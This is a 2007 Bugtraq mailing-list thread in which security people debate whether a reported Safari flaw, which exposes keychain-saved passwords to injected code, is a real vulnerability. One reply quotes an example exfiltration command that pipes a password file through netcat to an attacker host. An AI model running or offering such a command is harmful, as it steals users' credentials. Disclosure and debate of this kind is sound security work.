Date: Fri, 18 May 2007 13:13:53 -0400
From: "Kevin Finisterre (lists)" <kf_lists@...italmunition.com>
To: poplix <poplix@...uasia.org>
Cc: bugtraq@...urityfocus.com
Subject: Re: Apple Safari on MacOSX may reveal user's saved passwords

Make this javascript for Safari show me the saved key for another application (like a stored WEP key) and I'll be impressed.

-KF

On May 18, 2007, at 9:23 AM, poplix wrote:

> On 17 May 2007, at 7:50 PM, graham.coles@...-logic-group.com wrote:
>
>> It is also why I don't leave my machine logged in and accessible to other
>> users, which appears to be the whole basis of this 'vulnerability'.
>
> this is NOT the basis of the vulnerability. The point is that normally a
> malicious application running as non-root is not able to read keychained
> passwords.
> In this case, to steal passwords it is sufficient to entice the victim to
> execute a malicious script; that normally is not enough, since the keychain
> refuses access to untrusted applications.
> This issue exposes keychained passwords as if they were saved in a text
> file: an inexperienced user can lose his password by executing an untrusted
> malicious shell script (i.e. "cat /home/pop/pass | nc steal.com 666")
>
>> The whole concept of the keychain, however, is to restrict access to its
>> contents to the owner. If you can happily log in as the owner, then you
>> have everything they can access, INCLUDING the keychain. If they can't do
>> this, you just have some encrypted data. You don't HAVE to store web
>> passwords, of course.
>
> keychain asks for the password when the owner wants to see his data, and
> having access to a computer doesn't mean that you have the login password
> too
>
>> If you are sitting at the machine of a person who has left it logged in
>> and they use this feature, then whatever web browser you are using will
>> believe you are that person and provide access to the website
>> automatically--you don't need to see the password to use it.
>
> and what if you gain 5 minutes' access to a laptop in the middle of the
> desert where an internet connection is missing . . .
>
>> I'd like to know what Apple were supposed to do to fix this?
>
> i think it's sufficient to untrust the injected code....
>
>> It is, after all, YOUR keychain with YOUR passwords that YOU want
>> applications to recover when YOU are logged in. Why shouldn't YOU be able
>> to access it. If you don't want to use it don't, but if someone has to be
>> logged in as you to read it, that sounds about right.
>
> right?? it's like having passwords saved in a text file and 'chmod 700' it
>
>>>> Someone has *ROOT* access to your system REMOTELY over ssh and you're
>>>> worried that they might be able to retrieve a password from your
>>>> keychain.
>
> rooting a computer is really not the point, it's quite obvious that
> "rooted comp" => "TOTAL compromise"
>
> Let me ask a question: what if safari makes the loaded password part of
> the html so it's shown when clicking "view page source" ..?? should it be
> considered a vulnerability??
>
> cheers,
> -poplix
>
>>> Yes, it would be annoying if someone rooted my laptop. It would be a lot
>>> more annoying if they not only rooted my laptop but also cleaned out my
>>> bank account via my browser.
>>
>> 'Annoying' is the understatement of the millennium.
>>
>> As far as root access goes, see my comments above regarding key loggers?
>>
>> With root access they will have your gpg file, they will know what
>> processes are running (they will know when you run gpg) and they can
>> capture your keystrokes. Is this then a vulnerability of gpg? So much for
>> keeping your online banking safe. Even if you memorize the passwords, they
>> can still see your keypresses and therefore empty your bank account.
>>
>> If someone roots your machine, security is non-existent and trust beyond
>> repair. Don't trivialize this by comparing it to a 'might be able to see
>> your web passwords' issue, this is disaster incarnate and game over all
>> rolled into one!
>
>>> It *is* somewhat disturbing that root can so trivially interfere with
>>> the guts of someone else's processes. Normally, root has to do a lot of
>>> work to do that.
>>
>> With great power comes great responsibility, which is precisely why Macs
>> have the root login disabled and require a user designated as
>> 'Administrator' to authenticate themselves whenever system files are
>> modified or installed. Other users are created as non-administrator and
>> remote login is blocked by the firewall. The chances of anyone actually
>> logging in remotely as root on a normal Mac are zero as you, while
>> administrator, would have to specifically enable all of this. This is why
>> Apple warn you not to do it.
>>
>>>>> a different non-root user on the console can do it too
>>>> Which again restricts this vulnerability (as previously mentioned) to
>>>> an attacker who happens to be sitting in front of your machine(!)
>>
>>> Did you read the bit where I speculated about setuid applications?
>>
>> Yes, but again if you can get this far you either have the person's
>> identity or root access (bad or hopeless situation respectively). Why
>> worry incessantly about things that you stored in the keychain being
>> accessed when someone can access everything you own.
>>
>> Should the keychain refuse to divulge its contents to a person
>> authenticated as the owner?
>>
>> Is the answer to remove the keychain and watch as people revert to
>> storing their passwords unencrypted in stickies, or text files on their
>> desktop?
>>
>> You normally have to come up with a feasible attack vector for something
>> to be a vulnerability, this seems far too early to be notifying the
>> vendor.
>>
>> Saving passwords on any web browser is a lousy idea from a security
>> perspective. However, people don't like security, they like convenience.
>> The only real fix here is perhaps a disclaimer message advising people
>> not to store important passwords for websites in the browser in the first
>> place. But let's face reality, even if they did, would it stop people
>> doing it?
>
>>> --
>>> David Cantrell
>>
>> --
>> Graham Coles
>>
>> The Logic Group Enterprises Limited
>> Logic House, Waterfront Business Park, Fleet Road, Fleet,
>> Hampshire, GU51 3SB, UK
>> Registered in England. Registered No. 2609323